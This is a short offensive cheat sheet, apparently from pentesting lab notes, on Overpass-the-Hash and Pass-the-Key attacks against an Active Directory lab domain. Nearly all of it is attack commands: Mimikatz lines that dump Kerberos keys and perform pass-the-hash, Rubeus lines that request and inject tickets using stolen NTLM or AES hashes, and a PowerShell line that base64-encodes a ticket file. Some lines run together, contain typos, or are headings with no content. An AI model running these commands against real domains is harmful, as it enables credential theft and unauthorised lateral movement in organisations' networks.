overpass-the-hash
Pass the key or Overpass the hash
mimikatz.exe "sekurlsa::ekeys" exitmimikatz.exe "sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:<hash>" exitRubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<hash> /nowrapGet the ticket in base64 format (Rubeus)
Rubeus.exe asktgt /domain:inlanfeight.htb /user:palaintext /rc4:<hash> /pttConvert the ticket to Base64 format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"))Pass the ticket
Pass the ticket (connect remotely)
Last updated